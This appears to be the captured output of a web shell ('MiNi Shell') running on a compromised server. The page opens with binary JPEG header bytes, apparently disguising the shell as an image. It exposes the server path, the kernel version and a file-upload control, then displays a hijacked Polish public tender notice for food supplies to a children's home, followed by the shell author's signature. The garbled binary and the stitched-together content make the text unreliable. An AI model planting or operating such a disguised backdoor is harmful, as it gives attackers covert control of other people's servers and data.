JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151218/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151218/347634-N-2015.html

<p class="kh_header"><b>Warlubie: Dostawy art. spożywczych na 2016r.</b><br>
<b>Numer ogłoszenia: 347634 - 2015; data zamieszczenia: 18.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Placówka Opiekuńczo-Wychowawcza Nr 1 "Dom Dziecka" w Bąkowie , Bąkowo 37, 86-160 Warlubie, woj. kujawsko-pomorskie, tel. 52 3326009, faks 52 3326009.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.powiat.swiecki.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy art. spożywczych na 2016r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> - CZĘŚĆ I : RÓŻNE PRODUKTY SPOŻYWCZE - CPV 15800000-6 
Przedmiotem zamówienia publicznego jest sukcesywna dostawa art. spożywczych według asortymentu i w ilościach wyszczególnionych w załączniku nr 2 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu.

- CZĘŚĆ II:  PIECZYWO - CPV 15811000-6
Przedmiotem zamówienia publicznego jest sukcesywna dostawa pieczywa według asortymentu i w ilościach wyszczególnionych w załączniku nr 3 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu.

- CZĘŚĆ III:  NABIAŁ - CPV- 15500000-3
Przedmiotem zamówienia publicznego jest sukcesywna dostawa nabiału według asortymentu i w ilościach wyszczególnionych w załączniku nr 4 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu.

- CZĘŚĆ IV:  MIĘSO I WĘDLINY CPV - 15100000-9
Przedmiotem zamówienia publicznego jest sukcesywna dostawa mięsa i wędlin według asortymentu i w ilościach wyszczególnionych w załączniku nr 5 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu.

Mięso i wędliny muszą być świeże, nie mrożone, pozbawione obcych zapachów, uszkodzeń osłonek, opakowań, bez nalotów, zasinienia, zazielenienia, bez lepkości. Organoleptycznie bez zarzutu.

Wykonawca musi posiadać wszelkie przewidziane prawem dokumenty weterynaryjne na pochodzenie i ubój zwierząt, które zostały wykorzystane do
przygotowania asortymentu dostawy i udostępnić je na żądanie Zamawiającego lub służb do tego uprawnionych. Asortyment mięsa nie może być pozyskany ze sztuk chorych, knurów, ani z macior. W wędlinach oznaczonych w zestawieniu ilościowo wartościowym nie dopuszcza się obecności MOM - mięsa oddzielonego mechanicznie. Zamawiający ma prawo do zakwestionowania jakości dostarczonych produktów (zawartości mięsa, tłuszczu, wody i innych dodatków w wyrobach)  oraz ich smaku, a Wykonawca jest zobowiązany do wymiany towaru na odpowiadający jakością Zamawiającemu.

     - CZĘŚĆ V:  RYBY I PRODUKTY MROŻONE CPV 1520000-0
                          CPV - 15896000-5

Przedmiotem zamówienia publicznego jest sukcesywna dostawa ryb i produktów mrożonych według asortymentu i w ilościach wyszczególnionych w załączniku nr 6 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu.


     - CZĘŚĆ VI: JAJA CPV - 03142500-3

Przedmiotem zamówienia publicznego jest sukcesywna dostawa jaj według asortymentu i w ilościach wyszczególnionych w załączniku nr 7 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu.

     - CZĘŚĆ VII: OWOCE I WARZYWA  CPV 15300000-1
Przedmiotem zamówienia publicznego jest sukcesywna dostawa owoców i warzyw według asortymentu i w ilościach wyszczególnionych w załączniku nr 8 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu.

     - CZEŚĆ VIII: ZIEMNIAKI  CPV 15310000-4
Przedmiotem zamówienia publicznego jest sukcesywna dostawa ziemniaków według asortymentu i w ilościach wyszczególnionych w załączniku nr 9 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu.


Artykuły z wszystkich części zamówienia muszą posiadać odpowiednio długi termin przydatności do spożycia, muszą być wyprodukowane i dostarczone zgodnie z wymogami SANEPIDU i systemu HACCAP. Artykuły w opakowaniach winny być w oryginalnych opakowaniach oznaczone nazwą towaru, nazwą i siedzibą producenta, datą przydatności do spożycia z opisami w języku polskim, w opakowaniu nieuszkodzonym. Zamawiający w trakcie postępowania może zażądać od Wykonawcy dostarczenia próbek artykułów w celu potwierdzenia jakości i zgodności artykułów ze SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wnosi obowiązku wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie dokumentów i oświadczeń wymaganych w specyfikacji istotnych warunków zamówienia. Ocena spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie dokumentów i oświadczeń wymaganych w specyfikacji istotnych warunków zamówienia. Ocena spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie dokumentów i oświadczeń wymaganych w specyfikacji istotnych warunków zamówienia. Ocena spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie dokumentów i oświadczeń wymaganych w specyfikacji istotnych warunków zamówienia. Ocena spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie dokumentów i oświadczeń wymaganych w specyfikacji istotnych warunków zamówienia. Ocena spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z punktem 6 specyfikacji istotnych warunków zmówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności faktur - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.swiecki.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Placówka Opiekuńczo-Wychowawcza Nr 1 Dom Dziecka w Bąkowie Bąkowo37, 86-160 Warlubie, województwo Kujawsko-Pomorskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.12.2015 godzina 09:00, miejsce: Placówka Opiekuńczo-Wychowawcza Nr 1 Dom Dziecka w Bąkowie Bąkowo37, 86-160 Warlubie, województwo Kujawsko-Pomorskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - CZĘŚĆ I : RÓŻNE PRODUKTY SPOŻYWCZE - CPV 15800000-6 
Przedmiotem zamówienia publicznego jest sukcesywna dostawa art. spożywczych według asortymentu i w ilościach wyszczególnionych w załączniku nr 2 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - CZĘŚĆ II:  PIECZYWO - CPV 15811000-6
Przedmiotem zamówienia publicznego jest sukcesywna dostawa pieczywa według asortymentu i w ilościach wyszczególnionych w załączniku nr 3 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - CZĘŚĆ III:  NABIAŁ - CPV- 15500000-3
Przedmiotem zamówienia publicznego jest sukcesywna dostawa nabiału według asortymentu i w ilościach wyszczególnionych w załączniku nr 4 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - CZĘŚĆ IV:  MIĘSO I WĘDLINY CPV - 15100000-9
Przedmiotem zamówienia publicznego jest sukcesywna dostawa mięsa i wędlin według asortymentu i w ilościach wyszczególnionych w załączniku nr 5 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu.Mięso i wędliny muszą być świeże, nie mrożone, pozbawione obcych zapachów, uszkodzeń osłonek, opakowań, bez nalotów, zasinienia, zazielenienia, bez lepkości. Organoleptycznie bez zarzutu.

Wykonawca musi posiadać wszelkie przewidziane prawem dokumenty weterynaryjne na pochodzenie i ubój zwierząt, które zostały wykorzystane do
przygotowania asortymentu dostawy i udostępnić je na żądanie Zamawiającego lub służb do tego uprawnionych. Asortyment mięsa nie może być pozyskany ze sztuk chorych, knurów, ani z macior. W wędlinach oznaczonych w zestawieniu ilościowo wartościowym nie dopuszcza się obecności MOM - mięsa oddzielonego mechanicznie. Zamawiający ma prawo do zakwestionowania jakości dostarczonych produktów (zawartości mięsa, tłuszczu, wody i innych dodatków w wyrobach)  oraz ich smaku, a Wykonawca jest zobowiązany do wymiany towaru na odpowiadający jakością Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ryby i produkty mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ V:  RYBY I PRODUKTY MROŻONE CPV 1520000-0
                          CPV - 15896000-5

Przedmiotem zamówienia publicznego jest sukcesywna dostawa ryb i produktów mrożonych według asortymentu i w ilościach wyszczególnionych w załączniku nr 6 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - CZĘŚĆ VI: JAJA CPV - 03142500-3

Przedmiotem zamówienia publicznego jest sukcesywna dostawa jaj według asortymentu i w ilościach wyszczególnionych w załączniku nr 7 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - CZĘŚĆ VII: OWOCE I WARZYWA  CPV 15300000-1
Przedmiotem zamówienia publicznego jest sukcesywna dostawa owoców i warzyw według asortymentu i w ilościach wyszczególnionych w załączniku nr 8 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - CZEŚĆ VIII: ZIEMNIAKI  CPV 15310000-4
Przedmiotem zamówienia publicznego jest sukcesywna dostawa ziemniaków według asortymentu i w ilościach wyszczególnionych w załączniku nr 9 do SIWZ, według zamówień składanych przez Zamawiającego, do magazynu żywności w siedzibie Zamawiającego, w okresie od dnia podpisania umowy do 31.12.2016r. Zamówiony towar należy dostarczyć, wyładować na koszt wykonawcy do magazynu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com